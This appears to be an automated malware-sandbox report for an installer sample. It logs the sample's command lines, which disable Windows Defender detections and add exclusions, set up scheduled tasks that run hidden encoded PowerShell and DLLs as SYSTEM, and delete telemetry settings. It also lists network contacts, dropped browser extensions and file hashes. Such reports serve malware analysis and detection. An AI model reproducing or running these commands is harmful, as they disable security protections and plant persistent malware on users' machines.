"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gdZqBxLBP" /SC once /ST 01:10:52 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gdZqBxLBP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gdZqBxLBP"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ZJggANjsYpCqsGjEe" /SC once /ST 08:32:42 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe\" UK /Mvsite_idGNy 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "ZJggANjsYpCqsGjEe"

C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe

C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\WzbIWJP.exe UK /Mvsite_idGNy 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bCAdHbOFiqtMCRhbmR"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\yvWovCiVU\TlkYnZ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "eGwAoTnpAObQfPU" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "eGwAoTnpAObQfPU2" /F /xml "C:\Program Files (x86)\yvWovCiVU\SxRKAnO.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "eGwAoTnpAObQfPU"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "eGwAoTnpAObQfPU"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ALvbXdfFiQJKEp" /F /xml "C:\Program Files (x86)\LCifMpYymZWU2\zObJAyv.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "BIiSjOILpRnDn2" /F /xml "C:\ProgramData\WkkDuRgYrrqHXcVB\WmsXgcv.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "uCAhUOuaRBfXDMltv2" /F /xml "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\JPjolJJ.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "cLzKLCJHWfKFSkdKasF2" /F /xml "C:\Program Files (x86)\mVqQIGUXDOgrC\bUSpFiY.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "kkPqOHrufYpxTagPJ" /SC once /ST 02:49:52 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\IzRZTwSZebgYVSAl\PgHWHVfe\wCBsdaR.dll\",#1 /Fbsite_idJVc 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "kkPqOHrufYpxTagPJ"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\PgHWHVfe\wCBsdaR.dll",#1 /Fbsite_idJVc 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\PgHWHVfe\wCBsdaR.dll",#1 /Fbsite_idJVc 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "kkPqOHrufYpxTagPJ"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "ZJggANjsYpCqsGjEe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 193.78.101.95.in-addr.arpa udp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 121.150.80.3.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 225.110.86.104.in-addr.arpa udp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 3.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
NL 172.217.168.238:443 clients2.google.com tcp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 142.250.187.225:443 clients2.googleusercontent.com tcp
US 8.8.8.8:53 238.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 225.187.250.142.in-addr.arpa udp
NL 172.217.168.238:443 clients2.google.com tcp
US 8.8.8.8:53 api5.check-data.xyz udp
US 44.240.147.44:80 api5.check-data.xyz tcp
US 8.8.8.8:53 44.147.240.44.in-addr.arpa udp
US 8.8.8.8:53 202.110.86.104.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\7zS31BE.tmp\Install.exe

MD5 ea99e72c1ac89aa9cc14178b1c46d50d
SHA1 60b896781f40e89106d0c76abd11c5b5d0832943
SHA256 9cd503eed313e3c5293f192804c0f20a4eef448876f8375fbc26a25be36d5b28
SHA512 03693bda0c8b693c09e416a7d0c335294f74804f336058a59612a07aa0dd918cd70958cc95feba7d3b26b2df235b0a60d0347d6ed6e353fec8c87c969f6068f1

memory/784-14-0x0000000010000000-0x00000000105E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zuvbsnff.n2i.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/344-27-0x000001FC57510000-0x000001FC57532000-memory.dmp

memory/344-28-0x00007FFCCCD80000-0x00007FFCCD841000-memory.dmp

memory/344-29-0x000001FC6F830000-0x000001FC6F840000-memory.dmp

memory/344-30-0x000001FC6F830000-0x000001FC6F840000-memory.dmp

memory/344-33-0x00007FFCCCD80000-0x00007FFCCD841000-memory.dmp

memory/4244-38-0x0000000010000000-0x00000000105E8000-memory.dmp

memory/2748-41-0x0000000001950000-0x0000000001986000-memory.dmp

memory/2748-42-0x0000000004400000-0x0000000004A28000-memory.dmp

memory/2748-43-0x0000000073970000-0x0000000074120000-memory.dmp

memory/2748-44-0x0000000003DC0000-0x0000000003DD0000-memory.dmp

memory/2748-45-0x0000000003DC0000-0x0000000003DD0000-memory.dmp

memory/2748-46-0x00000000041B0000-0x00000000041D2000-memory.dmp

memory/2748-47-0x0000000004BA0000-0x0000000004C06000-memory.dmp

memory/2748-54-0x0000000004C10000-0x0000000004C76000-memory.dmp

memory/2748-58-0x0000000004DB0000-0x0000000005104000-memory.dmp

memory/2748-59-0x0000000005260000-0x000000000527E000-memory.dmp

memory/2748-60-0x0000000005830000-0x000000000587C000-memory.dmp

memory/2748-63-0x0000000073970000-0x0000000074120000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 33b19d75aa77114216dbc23f43b195e3
SHA1 36a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256 b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512 676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821

memory/3192-66-0x0000000003580000-0x0000000003590000-memory.dmp

memory/3192-65-0x0000000073970000-0x0000000074120000-memory.dmp

memory/3192-67-0x0000000003580000-0x0000000003590000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fb5615ceed1213d5320537ada24f80c9
SHA1 9c453aa53ffce553abfa37db17eeee35a548e625
SHA256 5f5e6e6aed5d1bdf6a41d590f02bd7cf06ef9945e21a3630b51f1689817e7c6b
SHA512 32e52318a1aa1643b90cbc78082eb2e7dd13b01d5896b27ae5e584f0d7373a50f347cd7be3fc71e56b2a57085255717487c79ced1eae00a2300f2ee43e6d3e9b

memory/3192-79-0x0000000073970000-0x0000000074120000-memory.dmp

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

memory/6056-89-0x00007FFCCCD80000-0x00007FFCCD841000-memory.dmp

memory/6056-95-0x0000017239030000-0x0000017239040000-memory.dmp

memory/6056-94-0x0000017239030000-0x0000017239040000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5caad758326454b5788ec35315c4c304
SHA1 3aef8dba8042662a7fcf97e51047dc636b4d4724
SHA256 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA512 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

memory/6056-98-0x00007FFCCCD80000-0x00007FFCCD841000-memory.dmp

memory/4764-104-0x0000000010000000-0x00000000105E8000-memory.dmp

memory/4764-115-0x0000000002E00000-0x0000000002E85000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 b52b989b409f4b9db91f8d20ff01089f
SHA1 a57051025f0b8c70f6a94e92245d96b18b941150
SHA256 a74e2045f5dc1e0d53227a3bc56a29f088dd94833732e99df86975bd0cf6b1e9
SHA512 cd769b36bcfd25dd998b9e76691d903a9d782e3d75e8c5129cf7b32f9481e78a06737d6473c62805c696eb76421420754017d3ebd240a14484a142db9f9819ae

memory/4764-157-0x0000000003440000-0x00000000034A5000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 af5a6b277700c3d5f2b18476dc79bf88
SHA1 cd73d9b216467ce5ef9c4ed007f21506bdcda9ce
SHA256 3bd8efb7779a1f95f313b9e441b865476c5ba63acfdebf0b6647413451b58ec9
SHA512 27649baa11485fb0f10638344c934df823c1546abb396f12ee1932bc03c663d6186c3b7720d6cbb7d3afe7b2765713e896d67cca02d736fd65142b4a1b30d611

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Program Files (x86)\yvWovCiVU\SxRKAnO.xml

MD5 192a9981bb9a2295beb7a1c86920d9f2
SHA1 e84c58e167e91ace0f1ba065155181b17866a8d0
SHA256 4295ce72b1ade0a208bb4adb5b2c2778121a1c958bec08ee8dfcde9a0096af78
SHA512 38fda644771995b58b94e0beb12e7642791499f5508d04befe7b563e40dc472a7f0ab06e21df5e6b637685333c2aff41dffd96e139e9f87c4bb562adbdefb05b

C:\Program Files (x86)\LCifMpYymZWU2\zObJAyv.xml

MD5 e81d7f0da01344c6ad0358b7728487c6
SHA1 cac31aca28da23deb730bb0705215b2e81e99871
SHA256 2ab708fe92cd3fd0536deb06376c6a65037c98b03678a13a4613b0b3781abc75
SHA512 33f6854a292fae946743f01bebea685727141a9b2e58e6659343cc7a3b23c45160ec58260687a4f96f32dfbcff1f9551e34fc2326cc6a1b0da9f1b263dd2470f

C:\ProgramData\WkkDuRgYrrqHXcVB\WmsXgcv.xml

MD5 7b1bdc9f5cae209d0d8613e3f57d8ba3
SHA1 c1fabd89628c56102d75b8517b82f835a5b5d9da
SHA256 a159f4b311956a03195056a38e1b31bb549e0ee45b3c6bfaa094920e8f46bf46
SHA512 3ada17ec37a35b6e9facfa17a2fcef322455b6eb57541568376939ed1202096181ddfa7cd1324ffccb59f0a287bd47dec39a307d0a544b7a550f92d5c7d3940c

C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\JPjolJJ.xml

MD5 1fcccb1da263bb4ac31565ac55e78fc2
SHA1 e6d6c427acc80762e6e908fcadc42bb1df458e12
SHA256 beb4431565daef7bb7330286e52cf9434c307a1bbf92df7b334a8949730f6be3
